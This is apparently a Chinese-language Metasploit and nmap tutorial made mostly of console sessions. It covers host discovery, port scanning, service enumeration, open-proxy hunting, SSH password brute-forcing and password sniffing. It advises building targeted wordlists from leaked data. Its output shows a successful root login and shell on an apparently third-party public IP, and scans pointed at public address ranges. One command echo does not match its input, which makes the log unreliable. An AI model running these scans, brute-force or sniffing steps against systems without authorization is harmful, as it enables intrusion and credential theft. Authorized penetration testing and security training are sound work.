一.ICMP
msf > ping -c 5 www.qq.com
//因特网报探测器。测试网络连接
whatweb :命令
[email protected]:~# whatweb www.mrliangqi.com
/usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require’: iconv will be deprecated in the future, use String#encode instead.
http://www.mrliangqi.com [200] Adobe-Flash, Country[CHINA][CN], Email[[email protected]], HTML5, HTTPServer[nginx], IP[121.42.27.192], JQuery[3.0], PHP[5.3.27], Script, Title[%E6%8E%A7%E4%BC%81%E9%B9%85%E7%9A%84'Bolg| %E5%85%B3%E6%B3%A8%E4%BA%92%E8%81%94%E7%BD%91 | %E5%85%B3%E6%B3%A8%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8], UncommonHeaders[x-pingback], WordPress, X-Powered-By[PHP/5.3.27], X-UA-Compatible[IE=10], nginx, x-pingback[http://www.mrliangqi.com/xmlrpc.php]
MSF主机发现模块
msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options
Module options (auxiliary/scanner/discovery/arp_sweep):
Name Current Setting Required Description
—- ————— ——– ———–
INTERFACE no The name of the interface
RHOSTS yes The target address range or CIDR identifier
SHOST no Source IP Address
SMAC no Source MAC Address
THREADS 1 yes The number of concurrent threads
TIMEOUT 5 yes The number of seconds to wait for new data
msf auxiliary(arp_sweep) > set RHOSTS 192.168.1.1/24
RHOSTS => 192.168.1.1/24
msf auxiliary(arp_sweep) > set ThREADS 50
ThREADS => 50
msf auxiliary(arp_sweep) > run
[*] 192.168.1.1 appears to be up (UNKNOWN).
[*] 192.168.1.10 appears to be up (UNKNOWN).
[*] 192.168.1.15 appears to be up (Wistron Neweb Corp.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
nmap -sn 192.168.1.0/24
//活跃主机探测
nmap -O 192.168.1.1
//探测目标主机操作系统版本
nmap -sS -Pn ip
//基本的端口扫描功能
nmap -sV -Pn ip
常用参数:
-sT :tcp扫描类似MSF中的tcp模块
-sS :tcp syn扫描类似MSF中syn
-Pn :在扫描前不发送ICMP echo请求来测试目标是否活跃。
-O :启动tcp/ip协议栈的指纹扫描来获取远程主机的操作系统类型等信息。
-F :快速扫描,只扫在NMAP-SERVERS中列出的端口。
auxiliary/scanner/http/wordpress_pingback_access normal WordPress Pingback Locator
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP “XMas” Port Scanner
auxiliary/scanner/sap/sap_router_portscanner normal SAPRouter Port Scanner
一般建议syn(使用发生TCP SYN标志的方式探测开放的端口)扫描,因为他速度快结果准确不容易被察觉。
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > set rhosts 192.168.1.1
rhosts => 192.168.1.1
msf auxiliary(syn) > set threads 20
threads => 20
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.1.1:80
———服务扫描与查点——-
msf auxiliary(syn) > search name:_version
//查看所有的服务查点模块
常见的网络服务扫描
1.telnet服务扫描
msf auxiliary(syn) > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set rhosts 192.168.1.15
rhosts => 192.168.1.15
msf auxiliary(telnet_version) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(telnet_version) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set rhosts 183.62.232.207
rhosts => 183.62.232.207
msf auxiliary(ssh_version) > set threads 100
threads => 100
msf auxiliary(ssh_version) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
3.oracle服务查点模块
msf auxiliary(ssh_version) > use auxiliary/scanner/oracle/tnslsnr_version
msf auxiliary(tnslsnr_version) > set threads 50
threads => 50
msf auxiliary(tnslsnr_version) > set rhosts 203.175.156.0/24
rhosts => 203.175.156.0/24
msf auxiliary(tnslsnr_version) > run
[*] Scanned 035 of 256 hosts (013% complete)
[*] Scanned 097 of 256 hosts (037% complete)
[*] Scanned 100 of 256 hosts (039% complete)
[*] Scanned 141 of 256 hosts (055% complete)
[*] Scanned 150 of 256 hosts (058% complete)
[*] Scanned 174 of 256 hosts (067% complete)
[*] Scanned 198 of 256 hosts (077% complete)
[*] Scanned 250 of 256 hosts (097% complete)
[*] Scanned 255 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
4.开放代理探测与利用
msf auxiliary(tnslsnr_version) > use auxiliary/scanner/http/open_proxy
msf auxiliary(open_proxy) > set site www.baidu.com
site => www.baidu.com
msf auxiliary(open_proxy) > set rhosts 24.25.24.1-24.25.26.254
rhosts => 24.25.24.1-24.25.26.254
msf auxiliary(open_proxy) > set multiports true
multiports => true
msf auxiliary(open_proxy) > set verify_connect true
verify_connect => true
msf auxiliary(open_proxy) > set threads 100
threads => 100
msf auxiliary(open_proxy) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.
四.口令猜测与嗅探
1.ssh服务口令猜测
前提:强大的词典是关键,最好结合社工库有针对性的最好。
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.1.1
rhosts => 183.62.232.207
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set pass_file /words.txt
pass_file => /words.txt
msf auxiliary(ssh_login) > set threads 50
threads => 50
msf auxiliary(ssh_login) > run
[*] 183.62.232.207:22 SSH – Starting bruteforce
[+] 183.62.232.207:22 SSH – Success: ‘root:password’ ‘uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-194.el5xen #1 SMP Tue Mar 16 22:01:26 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux ‘
[*] Command shell session 1 opened (192.168.1.17:59831 -> 183.62.232.207:22) at 2014-12-11 23:44:55 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
2.psnuffle口令嗅探
msf auxiliary(ssh_login) > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
msf auxiliary(psnuffle) >
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb…
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb…
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb…
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb…
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb…
[*] Sniffing traffic…..
